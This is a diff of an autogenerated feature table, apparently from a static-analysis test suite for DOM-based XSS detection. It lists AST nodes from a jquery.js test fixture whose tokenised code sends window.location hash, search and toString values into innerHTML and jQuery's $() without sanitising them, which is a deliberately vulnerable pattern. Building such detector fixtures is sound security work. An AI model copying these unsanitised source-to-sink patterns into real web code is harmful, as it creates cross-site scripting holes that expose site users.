    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:15:38:15:59 | window. ... .search | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:15:38:15:59 | window. ... .search | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:15:45:15:52 | location | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:15:45:15:52 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:15:45:15:52 | location | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:15:45:15:52 | location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:15:45:15:52 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:15:54:15:59 | search | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:15:54:15:59 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:15:54:15:59 | search | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:15:54:15:59 | search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:15:54:15:59 | search | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:16:3:16:5 | elm | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:16:3:16:5 | elm | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:16:3:16:5 | elm | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:16:3:16:5 | elm | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:16:3:16:5 | elm | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:16:3:16:15 | elm.innerHTML | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:16:3:16:15 | elm.innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:16:3:16:15 | elm.innerHTML | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:16:3:16:15 | elm.innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:16:3:16:15 | elm.innerHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:16:3:16:64 | elm.inn ... ring()) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:16:3:16:64 | elm.inn ... ring()) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:16:3:16:64 | elm.inn ... ring()) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:16:3:16:64 | elm.inn ... ring()) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:16:3:16:64 | elm.inn ... ring()) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:16:7:16:15 | innerHTML | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:16:7:16:15 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:16:7:16:15 | innerHTML | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:16:7:16:15 | innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:16:7:16:15 | innerHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:16:19:16:36 | decodeURIComponent | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:16:19:16:36 | decodeURIComponent | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:16:19:16:36 | decodeURIComponent | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:16:19:16:36 | decodeURIComponent | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:16:19:16:36 | decodeURIComponent | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:16:19:16:64 | decodeU ... ring()) | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/jquery.js:16:19:16:64 | decodeU ... ring()) | contextFunctionInterfaces | test() | | autogenerated/Xss/DomBasedXss/jquery.js:16:19:16:64 | decodeU ... ring()) | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/jquery.js:16:19:16:64 | decodeU ... ring()) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:16:19:16:64 | decodeU ... ring()) | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:16:19:16:64 | decodeU ... ring()) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:16:19:16:64 | exceptional return of decodeU ... ring()) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:16:19:16:64 | exceptional return of decodeU ... ring()) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:16:19:16:64 | exceptional return of decodeU ... ring()) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:16:19:16:64 | exceptional return of decodeU ... ring()) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:16:19:16:64 | exceptional return of decodeU ... ring()) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:16:38:16:43 | window | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:16:38:16:43 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:16:38:16:43 | window | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:16:38:16:43 | window | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:16:38:16:43 | window | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:16:38:16:52 | window.location | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:16:38:16:52 | window.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:16:38:16:52 | window.location | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:16:38:16:52 | window.location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:16:38:16:52 | window.location | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:16:38:16:61 | window. ... oString | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:16:38:16:61 | window. ... oString | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:16:38:16:61 | window. ... oString | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:16:38:16:61 | window. ... oString | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:16:38:16:61 | window. ... oString | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:16:38:16:63 | exceptional return of window. ... tring() | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:16:38:16:63 | exceptional return of window. ... tring() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:16:38:16:63 | exceptional return of window. ... tring() | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:16:38:16:63 | exceptional return of window. ... tring() | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:16:38:16:63 | exceptional return of window. ... tring() | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:16:38:16:63 | window. ... tring() | CalleeFlexibleAccessPath | decodeURIComponent | | autogenerated/Xss/DomBasedXss/jquery.js:16:38:16:63 | window. ... tring() | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:16:38:16:63 | window. ... tring() | contextFunctionInterfaces | test() | @@ -13920,6 +102629,71 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:16:38:16:63 | window. ... tring() | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:16:38:16:63 | window. ... tring() | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:16:38:16:63 | window. ... tring() | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:16:45:16:52 | location | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:16:45:16:52 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:16:45:16:52 | location | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:16:45:16:52 | location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:16:45:16:52 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:16:54:16:61 | toString | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:16:54:16:61 | toString | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:16:54:16:61 | toString | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:16:54:16:61 | toString | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:16:54:16:61 | toString | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:18:7:18:10 | hash | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:18:7:18:10 | hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:18:7:18:10 | hash | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:18:7:18:10 | hash | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:18:7:18:10 | hash | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:18:7:18:33 | hash | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:18:7:18:33 | hash | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:18:7:18:33 | hash | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:18:7:18:33 | hash | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:18:7:18:33 | hash | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:18:7:18:33 | hash = ... on.hash | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:18:7:18:33 | hash = ... on.hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:18:7:18:33 | hash = ... on.hash | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:18:7:18:33 | hash = ... on.hash | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:18:7:18:33 | hash = ... on.hash | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:18:14:18:19 | window | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:18:14:18:19 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:18:14:18:19 | window | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:18:14:18:19 | window | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:18:14:18:19 | window | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:18:14:18:28 | window.location | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:18:14:18:28 | window.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:18:14:18:28 | window.location | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:18:14:18:28 | window.location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:18:14:18:28 | window.location | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:18:14:18:33 | window.location.hash | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:18:14:18:33 | window.location.hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:18:14:18:33 | window.location.hash | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:18:14:18:33 | window.location.hash | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:18:14:18:33 | window.location.hash | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:18:21:18:28 | location | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:18:21:18:28 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:18:21:18:28 | location | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:18:21:18:28 | location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:18:21:18:28 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:18:30:18:33 | hash | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:18:30:18:33 | hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:18:30:18:33 | hash | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:18:30:18:33 | hash | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:18:30:18:33 | hash | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:19:3:19:3 | $ | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:19:3:19:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:19:3:19:3 | $ | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:19:3:19:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:19:3:19:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:19:3:19:9 | $(hash) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:19:3:19:9 | $(hash) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:19:3:19:9 | $(hash) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:19:3:19:9 | $(hash) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:19:3:19:9 | $(hash) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:19:3:19:9 | exceptional return of $(hash) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:19:3:19:9 | exceptional return of $(hash) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:19:3:19:9 | exceptional return of $(hash) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:19:3:19:9 | exceptional return of $(hash) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:19:3:19:9 | exceptional return of $(hash) | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:19:5:19:8 | hash | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/jquery.js:19:5:19:8 | hash | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:19:5:19:8 | hash | contextFunctionInterfaces | test() | @@ -13927,6 +102701,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:19:5:19:8 | hash | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:19:5:19:8 | hash | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:19:5:19:8 | hash | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:21:3:21:3 | $ | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:21:3:21:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:21:3:21:3 | $ | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:21:3:21:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:21:3:21:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:21:3:21:22 | $(hash.substring(1)) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:21:3:21:22 | $(hash.substring(1)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:21:3:21:22 | $(hash.substring(1)) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
